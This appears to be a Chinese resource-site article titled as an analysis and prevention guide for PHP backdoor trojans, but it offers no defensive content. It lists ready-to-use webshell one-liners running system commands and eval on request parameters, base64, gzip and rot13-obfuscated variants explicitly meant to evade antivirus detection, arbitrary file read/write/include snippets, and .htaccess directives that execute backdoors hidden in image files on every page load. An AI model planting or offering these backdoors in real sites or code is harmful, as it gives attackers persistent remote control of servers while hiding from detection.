最新公告
  • 欢迎加入阿奇源码资源网团队,精品资源持续增加!立即加入我们
  • php后门木马常用命令分析与防范

    广告!请自辨真伪 广告!请自辨真伪 广告!请自辨真伪
    幻夜手游 限时注册送一年会员,注册自动到账

    php后门木马常用的函数大致上可分为四种类型: 
      1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 
      2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 
      3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite 
      4. .htaccess: SetHandler, auto_prepend_file, auto_append_file 

      1. 执行系统命令: 
      system 函数 
      //test.php?cmd=ls 
      system($_GET[cmd]); 
      passthru 函数 
      //test.php?cmd=ls 
      passthru($_GET[cmd]); 
      shell_exec 函数 
      //test.php?cmd=ls 
      echo shell_exec($_GET[cmd]); 
      exec 函数 
      //test.php?cmd=ls 
      $arr = array(); 
      exec($_GET[cmd],$arr); 
      print_r($arr); 
      popen 函数 
      //test.php?cmd=ls 
      $handle = popen(‘$_GET[cmd], ‘r’); 
      $read = fread($handle, 2096); 
      echo $read; 
      pclose($handle); 
      proc_open 函数 
      //test.php?cmd=ls 
      $descriptorspec = array( 
      0 => array(‘pipe’, ‘r’), 
      1 => array(‘pipe’, ‘w’), 
      2 => array(‘pipe’, ‘w’), 
      ); 
      $proc = @proc_open($_GET[cmd], $descriptorspec, $pipes); 
      fclose($pipes[0]); 
      $output = array(); 
      while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),”\n”)); 
      print_r($output); 
      2. 代码执行与加密: 
      eval 函数 
      //最常见的一句话木马 
      eval($_POST[cmd]); 
      base64_decode 函数 
      //为了免杀及隐藏而加密代码 
      //密文: eval($_POST[‘cmd’]); 
      eval(base64_decode(‘ZXZhbCgkX1BPU1RbJ2NtZCddKTs=’)); 
      gzinflate 函数 
      //为了免杀及隐藏而加密代码 
      //密文: eval($_POST[‘cmd’]); 
      eval(gzinflate(base64_decode(‘Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==’))); 
      gzuncompress 函数 
      //为了免杀及隐藏而加密代码 
      //密文: eval($_POST[‘cmd’]); 
      eval(gzuncompress(base64_decode(‘eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==’))); 
      gzdecode 函数 
      //为了免杀及隐藏而加密代码 
      //密文: eval($_POST[‘cmd’]); 
      eval(gzdecode(base64_decode(‘H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==’))); 
      str_rot13 函数 
      //为了免杀及隐藏而加密代码 
      //密文: eval($_POST[cmd]); 
      eval(str_rot13(‘riny($_CBFG[pzq]);’)); 
      assert 函数 
      //类似eval函数 
      assert($_POST[cmd]); 
      call_user_func 函数 
      //使用call_user_func调用assert 
      call_user_func(‘assert’,$_POST[cmd]); 
      call_user_func 函数 
      //使用call_user_func调用任意函数 
      //test.php?a=assert&cmd=phpinfo() 
      call_user_func($_GET[a],$_REQUEST[cmd]); 
      组合代码 
      //组合方式调用任意函数 
      //test.php?a=assert&cmd=phpinfo() 
      $_GET[a]($_REQUEST[cmd]); 
      3. 文件包含与生成: 
      require 函数 
      //包含任意文件 
      //test.php?file=123.jpg 
      require($_GET[file]); 
      require_once 函数 
      //包含任意文件 
      //test.php?file=123.jpg 
      require_once($_GET[file]); 
      include 函数 
      //包含任意文件 www.chnhack.com 
      //test.php?file=123.jpg 
      include($_GET[file]); 
      include_once 函数 
      //包含任意文件 
      //test.php?file=123.jpg 
      include_once($_GET[file]); 
      file_get_contents 函数 
      //读取任意文件 
      //test.php?f=config.inc.php 
      echo file_get_contents($_GET[‘f’]); 
      file_put_contents 函数 
      //生成任意内容文件 
      //a=test.php&b= 
      file_put_contents($_GET[a],$_GET[b]); 
      fputs 函数 
      //生成任意内容文件 
      //a=test.php&b= 
      fputs(fopen($_GET[a],”w”),$_GET[b]); 
      4. .htaccess: 
      SetHandler 
      //可将php代码存于非php后缀文件,例: x.jpg 
      //将以下代码写入.htaccess中 
      //连接x.jpg即可启动后门木马出处www.admin8.us 

      SetHandler application/x-httpd-php 

      auto_prepend_file 
      //可将php代码存于非php后缀文件,例: 123.gif 
      //将以下代码写入.htaccess中, 文件路径必须是绝对路径 
      //访问网站上任何php文件都会启动该php后门木马 
      //可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马 
      php_value auto_prepend_file c:/apache2/htdocs/123.gif 
      auto_append_file 
      //类似auto_prepend_file 
      //可将php代码存于非php后缀文件,例: 123.gif 
      //将以下代码写入.htaccess中, 文件路径必须是绝对路径 
      //访问网站上任何php文件都会启动该php后门木马 
      php_value auto_append_file c:/apache2/htdocs/123.gif 

    声明:本站发布的文章及附件仅限用于学习和研究目的.请勿用于商业或违法用途,否则后果请用户自负。 本站所有资源不带技术支持,下载资源请24小时内删除,如用于违法用途,或者商业用途,一律使用者承担。

    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!hnymwl@foxmail.com
    2. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!
    3. 如果你也有好源码或者教程,可以到审核区发布,分享有金币奖励和额外收入!
    4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    5. 如有链接无法下载、失效或广告,请联系管理员处理!
    6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
    7. 本站不保证所提供下载的资源的准确性、安全性和完整性,源码仅供下载学习之用!
    8. 如用于商业或者违法用途,与本站无关,一切后果请用户自负!
    阿奇源码 » php后门木马常用命令分析与防范

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    开通终身会员能下载全站资源码?
    可以100%下载全站源码资源的,除部分失效资源,失效的可以联系客服尝试恢复。

    发表评论